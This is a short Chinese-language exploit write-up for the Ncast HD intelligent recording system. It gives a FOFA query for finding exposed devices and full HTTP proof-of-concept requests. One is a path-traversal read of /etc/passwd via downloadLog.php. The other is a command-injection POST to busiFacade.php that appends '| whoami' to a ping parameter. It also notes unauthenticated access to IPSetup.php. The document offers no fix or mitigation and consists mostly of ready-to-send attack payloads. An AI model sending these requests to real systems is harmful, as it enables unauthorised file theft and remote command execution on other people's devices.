Ncast高清智能录播系统存在任意文件读取漏洞以及busiFacade RCE漏洞

漏洞描述

由于系统对用户输入的文件路径未进行充分验证，允许用户输入任意文件路径，导致存在任意文件读取漏洞，攻击者可以利用该漏洞获取系统配置文件、密码文件等。该系统的/classes/common/busiFacade.php接口存在RCE漏洞，攻击者可以利用此漏洞执行任意命令。

fofa

app="Ncast-产品" && title=="高清智能录播系统"

poc

任意文件读取漏洞

GET /developLog/downloadLog.php?name=../../../../etc/passwd HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
Priority: u=1

RCE漏洞

POST /classes/common/busiFacade.php HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 146
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20whoami%22%5D%7D

漏洞复现

任意文件读取：

RCE：

以游客进行登录

可以直接未授权访问/manager/IPSetup.php